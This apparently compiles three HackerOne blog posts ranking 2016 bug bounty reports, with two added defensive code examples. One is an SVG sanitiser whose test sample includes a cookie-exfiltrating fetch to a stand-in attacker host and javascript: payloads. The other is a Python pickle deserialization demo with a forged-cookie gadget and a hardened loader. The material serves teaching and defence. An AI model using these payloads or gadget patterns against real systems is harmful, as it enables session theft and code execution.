
Top 5 Most Viewed Reports For Q2 2016

  • August 26th, 2016


In case you don’t have time to read three months of bug reports, here are the Top 5!

The Top 5 Most Viewed Bugs of the Second Quarter of 2016!

5. Reflected XSS on developer.uber.com via Angular template injection
This report earned $3,000 for albinowax. He included a link to this blog article (co-written by albinowax) that nicely explains client-side template injection: when user input is reflected into a page that AngularJS processes, any {{...}} expressions in that input are evaluated by Angular, which is how a harmless-looking reflection turned into XSS here.

4. Unauthenticated access to Content Management System - www1.pornhubpremium.com
Mak and all the other hackers in this post are HackerOne 90/90 Club members. That means they have a higher HackerOne Signal and Impact score than 90% of measured HackerOne hackers. This one earned $5,000.

3. Publicly exposed SVN repository, ht.pornhub.com
This was the most viewed report from Pornhub, who went public with their program on HackerOne shortly before this report was filed. Another one from Mak - nice job earning $10,000.

2. Local file read in image editor
Sl1m found this one and earned $5,000 from Imgur. And what a surprise, he is a member of the 90/90 Club.

1. OneLogin authentication bypass on WordPress sites
Uber has attracted the full attention of the best hackers on HackerOne, with $10,000 awards like this one. Jouko tied for the highest award among these five reports.

These two reports were actually in the Top 5, but were in last quarter’s blog so we exempted them from this list.

Public security disclosures make us all safer - they teach and inspire. Thank you to the hackers and companies that make them possible! Check out these instructions on how to share your reports on HackerOne.

Don't forget to upvote your favorite public disclosures in Hacktivity!

Rajesh F. Krishnan

Recent articles

The best security initiative you can take in 2017

As CEO of HackerOne, I am thrilled to confirm that, as part of our rapid growth, we have strengthened our…

Bug Bounties Help Keepsafe Secure The Data of 50 Million Consumers

Keepsafe is on a mission to help us keep our private lives as they should be - private. Bug bounties are a big…

Hack The Army Results Are In

The most ambitious Federal bug bounty program to date, Hack the Army, targeted operationally significant…

Top Vulnerability Reports of Third Quarter, 2016

  • October 28th, 2016

The Preferred State of Vulnerabilities

It’s time for the third installment of Top 5 Vulnerability Reports on HackerOne.

What a quarter! We sweated through the Vegas conferences, Hacked the World and held a jammed AMA on Reddit. Our hackers crossed the $10,000,000 mark of bounties earned. Best of all, our fantastic hackers helped companies find great vulnerabilities like the ones below.

Instead of listing the raw top five, we picked the five best fully detailed, non-repeat vulnerability reports of the quarter to share. Detailed reports are the most instructive, which is why we highlight them here.

The Top 5 Vulnerability Reports of Third Quarter, 2016:

  1. Mongo found that Uber’s passwordless-signup flow could be abused to change another user’s password, a full account takeover. Uber fixed it in a day (Mongo confirmed it) and paid out $10,000. In Uber’s words, “Thanks for the great find @mongo!”. We’re very glad to have Mongo hacking on HackerOne.

  2. A frequent reporter in this blog series, orange knows how not to waste a trip. In this case a trip to China, where a close look at an unsubscribe link on one of Uber’s .cn domains turned up a SQL injection vulnerability. The report earned a nice $4,000.

  3. Paragonie-Scott is one of the most vocal security team leaders on HackerOne. Read his reaction to this oddball .svg report, which reminds us that .svg is not like other image file formats: it is an XML document that can carry <script> elements and event-handler attributes, so a browser that renders an untrusted SVG inline will execute that script. That is by design, not a parser bug. Abdullah received the largest-ever bounty from the Paragon program, not to mention over 3,500 pageviews and counting.

  4. We see lots of phrases like “This is probably not a big deal…” in initial hacker reports. Modest hackers! This report, Subdomain takeover on http://fastly.sc-cdn.net/, began that way. Ebrietas started with an outdated DNS record (the name still pointed at CDN infrastructure nobody on the company’s side was using, so anyone could claim it) and ended with a $3,000 bounty payment. Thanks for preventing users from potentially being served attacker-controlled content.

  5. Egypt’s secgeek reported Html Injection and Possible XSS in sms-be-vip.twitter.com to Twitter. The vulnerability, which affected the latest versions of Internet Explorer, could have allowed injection of HTML tags and JavaScript execution. At HackerOne, we particularly like the professional, polite disagreement and resolution that came up along the way to a $420 reward. Nice find!
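A check a practitioner can run in an upload pipeline, as an added example tied to report 3 above (it is not code from the disclosed report or from Paragon Initiative): it parses an SVG and flags the constructs that make a browser run script when the file is rendered inline. The two sample documents, the `attacker.invalid` host and the `/tmp` path are constructed for illustration.

```python
"""Flag script-capable content in an uploaded SVG before serving it inline."""
import re
import xml.etree.ElementTree as ET

# Constructed samples for this example; not taken from the disclosed report.
BENIGN_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" width="10" height="10">
  <circle cx="5" cy="5" r="4" fill="red"/>
</svg>"""

MALICIOUS_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink" onload="alert(1)">
  <script>fetch('https://attacker.invalid/?c=' + document.cookie)</script>
  <a xlink:href="java&#9;script:alert(2)"><text y="10">click</text></a>
  <foreignObject width="10" height="10">
    <body xmlns="http://www.w3.org/1999/xhtml"><iframe src="https://attacker.invalid/"></iframe></body>
  </foreignObject>
</svg>"""

XLINK_HREF = "{http://www.w3.org/1999/xlink}href"
# Browsers drop ASCII control characters and spaces inside a URL scheme, so
# "java\tscript:" still runs; normalise before matching.
_CTRL_WS = re.compile(r"[\x00-\x20]")


def _local(name):
    """Strip a Clark-notation namespace: '{http://...}script' -> 'script'."""
    return name.rsplit("}", 1)[-1].lower()


def _is_script_url(value):
    normalised = _CTRL_WS.sub("", value).lower()
    return normalised.startswith(("javascript:", "data:text/html"))


def find_active_content(svg_bytes):
    """Return (kind, detail) pairs for every construct that lets a browser run
    script when it renders the document inline. An empty list means none found."""
    findings = []
    root = ET.fromstring(svg_bytes)
    for el in root.iter():  # root.iter() includes the root element itself
        tag = _local(el.tag)
        if tag in ("script", "foreignobject"):
            findings.append(("element", tag))
        # SMIL animation can retarget an href to a javascript: URL after load.
        if tag in ("set", "animate") and el.get("attributeName", "").endswith("href"):
            findings.append(("href-animation", tag))
        for attr, value in el.attrib.items():
            aname = _local(attr)
            if aname.startswith("on"):  # onload, onclick, onbegin, ...
                findings.append(("event-handler", f"{tag}@{aname}"))
            elif (attr == XLINK_HREF or aname == "href") and _is_script_url(value):
                findings.append(("script-url", f"{tag}@{aname}"))
    return findings


def is_safe_svg(svg_bytes):
    """True only when the document parses and carries no active content."""
    try:
        return not find_active_content(svg_bytes)
    except ET.ParseError:
        return False


if __name__ == "__main__":
    for label, doc in (("benign", BENIGN_SVG), ("malicious", MALICIOUS_SVG)):
        print(label, find_active_content(doc))
```

Rejecting active content is only half of the fix: user uploads should also be served with `Content-Disposition: attachment` or from an isolated origin (or rasterised to PNG), so that a file this check misses still cannot run in the application's origin. Entity-expansion attacks on the parser itself are a separate problem and call for a hardened parser such as defusedxml.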

Do you see vulnerabilities you think were instructive or otherwise awesome? You can vote here to highlight the best on the top of the Hacktivity page.

Want to appear here next quarter? Hack on! Or invite your own hackers like the companies here did. As I once read, every organization needs a bug bounty program!

Rajesh F. Krishnan


A Bountiful Year: Top Bugs and Hacktivity Highlights in 2016

  • January 12th, 2017

Hacktivity proudly showcases the achievements of our hackers and the community, culture, and collaboration we create through the act of hacking.

It was a wild ride for Hacktivity in 2016:

Let’s reflect on some of the major trends and patterns in our hacker community as seen through the eyes of Hacktivity.

Hacktivity's five most-voted vulnerabilities of the year

The top awards are not short on creativity, collaboration, and good ol' fashioned hard work. The highest-voted vulnerability report described how an attacker could feed a crafted serialized PHP object through a cookie to a vulnerable unserialize() call and end up with a remote shell on a production server.

Most-voted Vulnerabilities of the Year

5. Internal attachments can be exported via “Export as .zip” feature

This report from japzdivino claims the highest payout from HackerOne's very own bug bounty program, not just in 2016 but of all time: $12,500.

4. Change any Uber user’s password through /rt/users/passwordless-signup - Account Takeover

Since their public launch not long ago, Uber has quickly climbed to be one of the most successful bug bounty programs and community favorites. They couldn’t have done it without amazing hackers, among which is the reporter of this great find, mongo.

What the HackerOne community accomplishes is truly a team effort, and this report exemplifies it perfectly: creative bug hunt, mind-blowingly fast response, competitive reward, happy hacker, and safer program.

3. Partial disclosure of report activity through new “Export as .zip” feature

Awarded at $10,000, this is the second highest payout from our bug bounty program. Rockstar Hacker Faisal Ahm reported the flaw within 24 hours of the release of the feature that introduced it. And what’s more impressive? The issue was resolved within an hour of the report being filed (huge shoutout to our security team members!)

2. Oracle Webcenter Sites administrative and hi-privilege access available directly from the internet (/cs/Satellite)

LocalTapiola was considered a dark horse as compared to some of the 'usual suspects', but they proved themselves to be quite generous with critical issues found by sharp eyes, such as those of Teemu Kääriäinen. They're also the proud owners of the highest posted bounty award of $50K - perhaps we'll be hearing more from this program in the 2017 Hacktivity recap!

1. [phpobject in cookie] Remote shell/command execution

Pornhub's whopping $20,000 to static was eye-catching, but it’s part of a bigger trend: public programs are not shy about paying more for well-deserved efforts and to attract top-ranked hackers. This is the story we’ll keep coming back to and tell to our friends around the proverbial campfire.
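The object-in-cookie pattern behind the #1 report (and the deserialization bug mentioned at the top of this post), shown as an added example in Python rather than PHP: `pickle.loads` on client data is the direct analog of `unserialize()` on a cookie, and `__reduce__` plays the role of PHP's magic methods. This is not code from the disclosed report or from Pornhub; the secret key, the `/tmp` path and the session contents are placeholders.

```python
"""Object-in-cookie deserialization: the vulnerable pattern and a hardened one."""
import base64
import hashlib
import hmac
import json
import pickle

# Side effects are recorded here instead of executed so the demo stays harmless.
EXECUTED = []


def _run_command(cmd):
    """Stand-in for os.system(); a real gadget would name the real thing."""
    EXECUTED.append(cmd)
    return cmd


class Gadget:
    """pickle invokes whatever callable __reduce__ names during deserialization,
    the same hook PHP's __wakeup/__destruct give an attacker on unserialize()."""
    def __reduce__(self):
        return (_run_command, ("id > /tmp/pwned",))


# --- vulnerable: the server rehydrates whatever object the client sent ---
def load_session_vulnerable(cookie_value):
    return pickle.loads(base64.b64decode(cookie_value))


def forge_cookie():
    """What the attacker sends in the cookie instead of a session object."""
    return base64.b64encode(pickle.dumps(Gadget())).decode()


# --- hardened: data-only encoding plus a MAC so clients cannot mint cookies ---
SECRET = b"server-side-secret-key"  # assumption: loaded from config in real code


def make_cookie(session):
    body = base64.urlsafe_b64encode(
        json.dumps(session, separators=(",", ":")).encode()).decode()
    tag = hmac.new(SECRET, body.encode(), hashlib.sha256).hexdigest()
    return f"{body}.{tag}"


def load_session_hardened(cookie_value):
    """Return the session dict, or None for anything this server did not mint."""
    body, sep, tag = cookie_value.rpartition(".")
    if not sep:
        return None
    expected = hmac.new(SECRET, body.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, tag):
        return None
    return json.loads(base64.urlsafe_b64decode(body))  # plain data, never objects


if __name__ == "__main__":
    print("vulnerable:", load_session_vulnerable(forge_cookie()), EXECUTED)
    genuine = make_cookie({"uid": 42})
    print("hardened, genuine:", load_session_hardened(genuine))
    print("hardened, forged:", load_session_hardened(forge_cookie()))
```

The hardened loader never reaches a deserializer on untrusted bytes: the MAC check comes first, and what it protects is JSON, which cannot name a class or a callable. Note that even the "vulnerable" half is only a stand-in; a real pickle payload can reference any importable callable, `os.system` included, without the target defining a gadget class at all.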

Hacktivity's five most-voted programs of the year

Not surprisingly, all of these programs are in the 90th percentile of what we deem as "Reward Competitiveness" with our Hacker Success Index Measurements. Basically, they incentivize hackers to hack their programs - and hack again and again because they’ll be rewarded for it!

Most-voted Programs of the Year

5. Shopify | https://hackerone.com/shopify
4. Twitter | https://hackerone.com/twitter
3. Pornhub | https://hackerone.com/pornhub
2. HackerOne | https://hackerone.com/security
1. Uber | https://hackerone.com/uber

Hacktivity's five most-voted hackers of the year

These hackers stood above the rest in 2016, boasting one of the most coveted things of all: recognition from their peers. Hail the top hackers!

Most-voted Hackers of the Year

5. japzdivino | https://hackerone.com/japzdivino
4. jobert | https://hackerone.com/jobert
3. static | https://hackerone.com/static
2. fransrosen | https://hackerone.com/fransrosen
1. bobrov | https://hackerone.com/bobrov

Looking Ahead

What a year it was, but 2017’s got a lot of great things in store! We would love to hear from you about what you’d like to see in Hacktivity. Feel free to send suggestions to feedback@hackerone.com.

Join us as we raise a glass to lots of Hacktivity in 2017!

Cheers,
Pei & Luke

PS: We also tabulated the top bugs based on payouts last year - A look at the top HackerOne bug bounties of 2016.
